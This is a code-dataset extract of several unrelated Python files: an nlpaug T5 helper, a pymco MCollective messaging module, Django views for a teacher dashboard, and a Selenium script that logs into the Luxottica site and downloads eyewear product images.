tokens\n\n def get_min_length(self, text):\n return int(len(text) * self.min_length) if self.min_length < 1 else self.min_length\n\n def get_max_length(self, text):\n if self.max_length < 1:\n return int(len(text) * self.max_length)\n else:\n if len(text) >= self.max_length:\n return int(len(text) * self.default_max_length_ratio)\n else:\n return self.max_length\n", "sub_path": "nlpaug/model/lang_models/t5.py", "file_name": "t5.py", "file_ext": "py", "file_size_in_byte": 3052, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "nlpaug.model.lang_models.LanguageModels", "line_number": 15, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 32, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 32, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 36, "usage_type": "attribute"}, {"api_name": 
"transformers.AutoModelForSeq2SeqLM.from_pretrained", "line_number": 37, "usage_type": "call"}, {"api_name": "transformers.AutoModelForSeq2SeqLM", "line_number": 37, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 38, "usage_type": "call"}, {"api_name": "nlpaug.util.text.tokenizer.SENTENCE_SEPARATOR", "line_number": 64, "usage_type": "attribute"}, {"api_name": "nlpaug.util.text.tokenizer", "line_number": 64, "usage_type": "name"}]} {"seq_id": "191512650", "text": "'''pymco messaging objects'''\nimport collections\nimport hashlib\nimport time\n\nimport six\n\nfrom . import exc\n\n\nclass Filter(collections.Mapping):\n '''Provides MCollective filters for pymco. This class implements\n :py:class:`collections.Mapping` interface, so it can be used as non mutable\n mapping (read only dict), but mutable using provided add methods. So that,\n for adding the agent you can just use :py:meth:`add_agent`::\n\n filter.add_agent('package')\n '''\n def __init__(self):\n self._filter = {\n 'cf_class': [],\n 'agent': [],\n 'fact': [],\n 'identity': [],\n 'compound': [],\n }\n\n def add_cfclass(self, klass):\n '''Adds new classes/recipes/cookbooks/roles applied by your\n configuration management system.'''\n self._filter['cf_class'].append(klass)\n return self\n\n def add_agent(self, agent):\n '''Adds new agents'''\n self._filter['agent'].append(agent)\n return self\n\n def add_fact(self, fact, value, operator=None):\n '''Adds new facts'''\n toappend = {':fact': fact, ':value': value}\n if operator:\n if not operator in ('==', '=~', '<=', '=>', '>=', '=<', '>', '<',\n '!='):\n raise exc.BadFilterFactOperator(\n 'Unsuppoerted operator {0}'.format(operator))\n toappend[':operator'] = operator\n self._filter['fact'].append(toappend)\n return self\n\n def add_identity(self, identity):\n '''Adds new identities'''\n self._filter['identity'].append(identity)\n return self\n\n def __getitem__(self, key):\n return self._filter[key]\n\n def __len__(self):\n return len(self._filter)\n\n def __iter__(self):\n return six.iterkeys(self._filter)\n\n\nclass Message(collections.MutableMapping):\n '''Provides MCollective messages for pymco. 
This class implements\n :py:class:`collections.MutableMapping` interface, so it can be used as\n read/write mapping (dictionary).'''\n def __init__(self, body, agent, config, filter_=None, **kwargs):\n if not filter_:\n filter_ = Filter()\n\n self._message = {}\n try:\n self._message[':senderid'] = config['identity']\n self._message[':collective'] = (kwargs.get('collective', None) or\n config['main_collective'])\n except KeyError as error:\n raise exc.ImproperlyConfigured(error)\n self._message[':msgtime'] = int(time.time())\n self._message[':ttl'] = (kwargs.get('ttl', None) or\n config.getint('ttl', default=60))\n self._message[':requestid'] = hashlib.sha1(\n str(self._message[':msgtime']).encode('utf-8')).hexdigest()\n self._message[':body'] = body\n self._message[':agent'] = agent\n self._message[':filter'] = dict(filter_)\n\n def __len__(self):\n return len(self._message)\n\n def __iter__(self):\n return six.iterkeys(self._message)\n\n def __getitem__(self, key):\n return self._message[key]\n\n def __setitem__(self, key, value):\n if not key.startswith(':'):\n raise ValueError('Keys must start with `:`, as Ruby symbols.')\n\n if key == ':filter':\n value = dict(value)\n self._message[key] = value\n\n def __delitem__(self, key):\n del self._message[key]\n", "sub_path": "pymco/message.py", "file_name": "message.py", "file_ext": "py", "file_size_in_byte": 3470, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "collections.Mapping", "line_number": 11, "usage_type": "attribute"}, {"api_name": "six.iterkeys", "line_number": 63, "usage_type": "call"}, {"api_name": "collections.MutableMapping", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 84, "usage_type": "call"}, {"api_name": "six.iterkeys", "line_number": 94, "usage_type": "call"}]} {"seq_id": "532102261", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext,loader,Context\nimport Query\nimport Constant\nimport dummydata\nfrom gaesessions import get_current_session\nimport logging\nfrom google.appengine.ext import ndb\ndef get_not_recently_loggedin(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n notrecentlydict =Query.get_students_not_logged_in_by_class(teacherkey)\n logging.error('sbxjks' )\n logging.error(notrecentlydict)\n t = loader.get_template('Dashboard/not_recently_logged_in_all')\n c = Context({'notrecentlylogin': notrecentlydict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef mastery_by_student_by_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n mastery_by_student = Query.get_mastery_by_student_of_class(teacherkey)\n\n t = loader.get_template('Dashboard/teacher_mastery_by_student')\n c = Context({'mastery_by_student':mastery_by_student ,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_not_recently_loggedin_all(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n notrecentlyloggedin = Query.get_students_not_logged_in_of_all_class(teacherkey)\n logging.error(notrecentlyloggedin)\n t = loader.get_template('Dashboard/not_recently_logged_in_all')\n c = Context({'notrecentlyloginall': notrecentlyloggedin,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef 
getaveragemasterybysubjectallclass(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n averagemasterybysubject = Query.get_average_mastery_by_subject_of_all_class(teacherkey)\n logging.error(averagemasterybysubject)\n t = loader.get_template('Dashboard/averagemasterybysubject_allclass.xml')\n c = Context({'averagemasterydict': averagemasterybysubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_classes_of_teacher(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n classdetails = Query.get_class_details_of_teacher(teacherkey)\n\n t = loader.get_template('Dashboard/getclassdetails_byteacher')\n c = Context({'getclassdetailsdict': classdetails,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_students_not_logged_in_by_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n notrecentlyloggedin = Query.get_students_not_logged_in_by_class(teacherkey,classkey)\n\n t = loader.get_template('Dashboard/notrecentlyloggedin_byclass')\n c = Context({'notrecentlyloggedinbyclass': notrecentlyloggedin,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef getaveragemasterybysubjectallsubject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n averagemasterybysubject = Query.get_average_mastery_all_subject_detailed(teacherkey,classkey)\n logging.error(averagemasterybysubject)\n t = loader.get_template('Dashboard/averagemasterybysubject_allsubject')\n c = Context({'averagemasterydict': averagemasterybysubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef get_assessment_coverage_of_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n assessmentcoveragedict = Query.get_assessment_coverage_of_class(teacherkey,classkey)\n logging.error(\"&&&&&&&&&&&&&&&&&&777\"+str(assessmentcoveragedict))\n t = loader.get_template('Dashboard/assessmentcoveragebyclass')\n c = Context({'assessmentcoveragedict': assessmentcoveragedict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_subject_of_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n logging.error(classkey)\n subjectdict = Query.get_subject_details_of_teacher_in_class(teacherkey,classkey)\n t = loader.get_template('Dashboard/getsubjectofclass')\n c = Context({'getsubjectofclass': subjectdict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_readytolearn_of_subject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n logging.error(\"99999999999999999999999999999999\")\n readytolearn = Query.get_ready_to_learn_of_class(teacherkey,classkey,subjectkey)\n t = loader.get_template('Dashboard/readytolearn_ofsubjectofclass')\n c = Context({'readytolearndict': readytolearn,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_assessment_coverage_of_subject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = 
request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n assessmentcoveragedict = Query.get_assessment_coverage_of_subject(teacherkey,classkey,subjectkey)\n logging.error(\"101010\"+str(assessmentcoveragedict))\n t = loader.get_template('Dashboard/assessmentcoverageofsubject')\n c = Context({'assessmentcoveragedict': assessmentcoveragedict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef get_averagemastery_of_subject_topicwise(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n averagemasteryofsubject = Query.get_average_mastery_of_a_subject(teacherkey,classkey,subjectkey)\n logging.error(averagemasteryofsubject)\n t = loader.get_template('Dashboard/averagemasteryofsubjecttopicwise')\n c = Context({'averagemasterydict': averagemasteryofsubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n", "sub_path": "AssessingPie/teacher_dashboard_data.py", "file_name": "teacher_dashboard_data.py", "file_ext": "py", "file_size_in_byte": 6305, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "gaesessions.get_current_session", "line_number": 11, "usage_type": "call"}, {"api_name": "Query.get_students_not_logged_in_by_class", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 15, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 16, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 16, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 17, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 18, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 22, "usage_type": "call"}, {"api_name": "Query.get_mastery_by_student_of_class", "line_number": 24, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 26, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 26, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 27, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 28, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 31, "usage_type": "call"}, {"api_name": "Query.get_students_not_logged_in_of_all_class", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 34, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 35, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 35, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 36, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 37, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 40, "usage_type": "call"}, {"api_name": "Query.get_average_mastery_by_subject_of_all_class", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 43, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 44, "usage_type": "call"}, {"api_name": "django.template.loader", 
"line_number": 44, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 46, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 49, "usage_type": "call"}, {"api_name": "Query.get_class_details_of_teacher", "line_number": 51, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 53, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 53, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 54, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 55, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 58, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 61, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 61, "usage_type": "name"}, {"api_name": "Query.get_students_not_logged_in_by_class", "line_number": 62, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 64, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 64, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 65, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 66, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 69, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 72, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 72, "usage_type": "name"}, {"api_name": "Query.get_average_mastery_all_subject_detailed", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 74, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 75, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 75, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 76, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 77, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 81, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 84, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 84, "usage_type": "name"}, {"api_name": "Query.get_assessment_coverage_of_class", "line_number": 85, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 86, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 87, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 87, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 88, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 92, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 95, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 95, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 96, "usage_type": "call"}, {"api_name": "Query.get_subject_details_of_teacher_in_class", "line_number": 97, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 98, "usage_type": "call"}, {"api_name": "django.template.loader", 
"line_number": 98, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 100, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 103, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 106, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 106, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 108, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 108, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 109, "usage_type": "call"}, {"api_name": "Query.get_ready_to_learn_of_class", "line_number": 110, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 111, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 111, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 112, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 113, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 116, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 119, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 119, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 121, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 121, "usage_type": "name"}, {"api_name": "Query.get_assessment_coverage_of_subject", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 123, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 124, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 124, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 125, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 126, "usage_type": "call"}, {"api_name": "gaesessions.get_current_session", "line_number": 130, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 133, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 133, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 135, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 135, "usage_type": "name"}, {"api_name": "Query.get_average_mastery_of_a_subject", "line_number": 136, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 137, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 138, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 138, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 139, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 140, "usage_type": "call"}]} {"seq_id": "483444712", "text": "'''\nAutor: Marcos Felipe da Silva\nversão: 1.5\ndata: 18-11-2019\n------------------------------\nAcessar o site da luxottica, se autenticar, navegar nos menus, retirar imagens e sair\n------------------------------\nHistorico:\nv1.0 Acessa site da luxottica, autentica navega sobre os menus e extrai as imagens das armações\nv1.1 Agora com melhorias de erros, controla a gravação das imagens, reconhece imagens não encontradas\n e gera log dos links de imagens 
que foram obtidas como gifs\nv1.2 Acertado problema onde o script nao estava saltando para a proxima pagina dentro da grife.\nv1.3 Incluso o atendimento a uma execao quando for baixar imagem e tambem incluso o scrollTo para rolar abaixo na tela\nV1.4 Salva o local onde se encontra o fluxo de download para retomar do ponto onde parou.\nv1.5 Baixa imagens de tamanho maior para melhorar visualização das mesmas.\n'''\n\nfrom selenium.webdriver import ChromeOptions, Chrome\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport selenium.common.exceptions\nfrom bs4 import BeautifulSoup as bfs\nfrom urllib.request import urlretrieve\nfrom time import sleep\nfrom chave_api import chave\nimport re, os, urllib, pickle\n\n\nchrome_driver = '../chrome/chromedriver'\nurl = 'https://my.luxottica.com'\n## Opcoes do chrome\nopt = ChromeOptions()\nopt.add_argument('--headless')\n\ntempo = 2 # tempo de espera dos processos\n# Arquivo que contem o indice de onde a busca de armações parou\nARQUIVO_INDICE_GRIFES = 'grifes.pickle'\n#\n\ndados_salvos = {\n 'grife': 0,\n 'pag_atual':1 \n}\n# CARREGANDO O INDICE ATUAL (SE EXISTIR)\nif os.path.exists(ARQUIVO_INDICE_GRIFES):\n with open(ARQUIVO_INDICE_GRIFES, 'rb') as arq:\n dados_salvos = pickle.load(arq)\n\n\nclass Luxottica:\n\n def __init__(self, url, pag_atual):\n self._url = url\n self.__driver = Chrome(chrome_driver, options=opt)\n self.__driver.get(url)\n self._regex_grifes = {'data-analytics': re.compile('.*')}\n self._pag_atual = pag_atual # controla o indice atual da pagina\n self._grife_atual = None\n self._modelo_atual = None\n self._cor_atual = None\n \n sleep(2)\n \n def login(self):\n cpUser = self.__driver.find_element_by_name('logonId')\n cpPasswd = self.__driver.find_element_by_name('logonPassword')\n bt = self.__driver.find_element_by_xpath('//button[@type=\"submit\"]')\n # Envaindo usuario e senha\n cpUser.clear();cpUser.send_keys(chave['usuario'])\n #sleep(1)\n cpPasswd.clear();cpPasswd.send_keys(chave['senha'])\n #sleep(1)\n bt.click()\n sleep(1)\n self.selecao_grife()\n sleep(2)\n self.quit()\n return True\n \n def quit(self):\n self.__driver.quit()\n\n def selecao_grife(self):\n ''' Metodo seleciona a grife informada procurando por data-analytics'''\n # Recupere e exiba todas as grifes disponiveis\n bs = bfs(self.__driver.page_source, 'html5lib')\n # Obtem os links\n todas = bs.find('ul', {'class':'brand-element product toAnalytics'}).find_all('a', self._regex_grifes)\n for num, t in enumerate(todas[dados_salvos['grife']:], dados_salvos['grife']):\n # SALVANDO A POSICAO ATUAL QUE ESTOU\n with open(ARQUIVO_INDICE_GRIFES, 'wb') as arq:\n dados_salvos['grife'] = num\n pickle.dump(dados_salvos, arq)\n\n self.__driver.get(t['href'])\n sleep(tempo)\n while True: # Equanto tiver pagina para seguir adiante\n sleep(tempo) # temp\n pagina_atual = self.__driver.current_url\n self._grife_atual = t['data-analytics'].strip() # Pega o nome da grife atual\n # VER SE JA FOI CARREGADO\n try:\n element = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, 'a.current'))\n )\n bs = bfs(self.__driver.page_source, 'html5lib')\n finally:\n pag_atual = int(bs.find('a', {'class': 'current'}).get_text())\n # SE self._pag_atual FOR MAIOR QUE pag_atual VA AVANCANDO ATE A PAGINA QUE PRECISA ESTAR\n if self._pag_atual > pag_atual: # AVANCE UMA PAGINA\n 
self.__driver.find_element_by_xpath('//a[@data-analytics=\" NEXT\"]').click()\n continue\n\n\n\n print('PAGINA ATUAL %d' % int(pag_atual))\n # Selecione os modelos\n modelos = bs.find('section', {'class': 'product-grid'}).find('ul').find_all('div', {'class': 'wrap-link'})\n # passe cada mode para ter sua imagem extraida\n for md in modelos:\n self._modelo_atual = md.find('h3', {'class': 'model-code'})['data-analytics'].strip()\n href = md.find('a')['href']\n self.selecao_modelo(href)\n self._modelo_atual = None # zerando o modelo\n # acabou a pagina, passe para a outra (procure por data-analytics=\" NEXT\")\n nextLink = bs.find('a', {'data-analytics': \" NEXT\"})\n if nextLink:\n # RECUPERAR O OBJETO AGORA\n self.__driver.get(pagina_atual)\n sleep(tempo)\n elemento = None\n try: # Espere o icone do data-analytics aparecer\n elemento = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//a[@data-analytics=\" NEXT\"]'))\n )\n except selenium.common.exceptions.StaleElementReferenceException:\n print('NAO ENCONTRADO BOTAO PARA CLICK ')\n print(self.__driver.page_source)\n finally:\n if not elemento is None:\n self.__driver.find_element_by_xpath('//a[@data-analytics=\" NEXT\"]').click()\n self._pag_atual += 1\n # Salvar posicao atual da pagina\n self.salvar_dados()\n print('PASSANDO A PROXIMA PAGINA')\n else: # Chegamos ao fim. passando para a proxima familia\n print('FIM DA GRIFE ----------->')\n self._pag_atual = 1\n self.salvar_dados()\n break\n\n self._grife_atual = None # Zerando a grife\n\n def salvar_dados(self):\n ''' Salva a pagina atual e a grife que se encontra '''\n dados_salvos['pag_atual'] = self._pag_atual\n with open(ARQUIVO_INDICE_GRIFES, 'wb') as arq:\n pickle.dump(dados_salvos, arq)\n \n \n def selecao_modelo(self, modelo):\n ''' Metodo seleciona o modelo ORJ9052S e então passa as cores '''\n #\n self.__driver.get(modelo)\n sleep(tempo)\n # Da uma navegada na pagina para carregar ela por completo\n for i in range(1, 8):\n self.__driver.execute_script('window.scrollTo(0, %d);' % (i * 200))\n sleep(.5)\n \n bs = bfs(self.__driver.page_source, 'html5lib')\n #Se prosseguir com erro vamos tratar a exceção\"\n elemento = None\n try:\n elemento = WebDriverWait(self.__driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//table[@id=\"brand-products-info\"]'))\n )\n if not elemento is None: todos_itens = bs.find('table', {'id':'brand-products-info'}).find('tbody').find_all('tr')\n except selenium.common.exceptions.TimeoutException:\n pass\n finally:\n if elemento is None or not elemento:\n print(elemento) \n print('NÃO ENCONTROU CONJUNTO DE CORES')\n todos_itens = []\n \n for item in todos_itens:\n print(self._grife_atual, '_', self._modelo_atual, '_', item['data-color'])\n self._cor_atual = item['data-color'].strip().replace('/', '--')\n imagem = item.find('td', {'class':'first'}).find('img', {'class':'images lazy'})\n self.selecao_cor(self._url+imagem['src'])\n #sleep(tempo) não é necessário um tempo\n self._cor_atual = None # Zerando a cor\n\n def selecao_cor(self, cor):\n ''' FINALMENTE NA SELECAO DE COR CONSEGUE-SE BAIXAR a imagem desejada '''\n #NECESSARIO LIDAR COM IMAGENS QUE NAO EXISTAM urllib.error.HTTPError: HTTP Error 404: Not Found\n nome, ext = os.path.basename(cor).rsplit('.', 1)\n nome_arquivo = '_'.join([self._grife_atual, self._modelo_atual, self._cor_atual])+'.'+ext\n # Todos que são .gif devem ser armazenados no arquivo gifs.log\n if ext == 'gif':\n with open('gifs.log', 'a') as arq:\n arq.write('%s \\n' % 
(nome_arquivo))\n return False\n \n if not os.path.exists('imagens/'+nome_arquivo): # Se nao existe o arquivo vamos baixar\n try:\n urlretrieve(cor, 'imagens/'+nome_arquivo)\n except urllib.error.HTTPError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('ARQUIVO NÃO ENCONTRADO: %s => %s \\n' % (nome_arquivo, cor))\n except urllib.error.URLError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('CONEXAO RESETADA: %s => %s ====> %s\\n' % (nome_arquivo, cor, str(err)))\n # VEJA SE O ARQUIVO DE RESOLUCAO MAIOR TAMBÉM NAO EXISTE, SE NÃO EXISTIR SALVE\n if not os.path.exists('imagens_maior/'+nome_arquivo): # Se nao existe o arquivo vamos baixar\n # troque 222x111 por 890x445\n novo_cor = cor.replace('222x111', '890x445')\n try:\n urlretrieve(novo_cor, 'imagens_maior/'+nome_arquivo)\n except urllib.error.HTTPError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('ARQUIVO NÃO ENCONTRADO: %s => %s \\n' % (nome_arquivo, novo_cor))\n except urllib.error.URLError as err:\n print(err)\n with open('erros.log', 'a') as arq:\n arq.write('CONEXAO RESETADA: %s => %s ====> %s\\n' % (nome_arquivo, novo_cor, str(err)))\n\n\nif __name__ == '__main__':\n # Instanciando a Luxottica e ativando o login\n l = Luxottica(url, dados_salvos['pag_atual'])\n l.login()\n\n\n", "sub_path": "luxottica/luxottica.py", "file_name": "luxottica.py", "file_ext": "py", "file_size_in_byte": 10712, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "selenium.webdriver.ChromeOptions", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 56, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 64, "usage_type": "call"}, {"api_name": "chave_api.chave", "line_number": 71, "usage_type": "name"}, {"api_name": "chave_api.chave", "line_number": 73, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 78, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 88, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 95, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 100, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 105, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 106, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 106, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 106, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 106, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 135, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 136, 
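The resume-from-checkpoint logic in luxottica.py is spread across the module-level pickle load, selecao_grife and salvar_dados. A compact sketch of the same pickle-based checkpoint pattern in one place (the Checkpoint class is my own illustration, not part of the script):

import os
import pickle

class Checkpoint:
    """Persist crawl progress (brand index, current page) so a restart can resume."""
    def __init__(self, path, defaults):
        self.path, self.state = path, dict(defaults)
        if os.path.exists(path):
            with open(path, 'rb') as fh:
                self.state = pickle.load(fh)

    def save(self, **updates):
        self.state.update(updates)
        with open(self.path, 'wb') as fh:
            pickle.dump(self.state, fh)

# Usage mirroring the script:
# ck = Checkpoint('grifes.pickle', {'grife': 0, 'pag_atual': 1})
# ck.save(grife=3)   # persisted before each brand, as selecao_grife does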
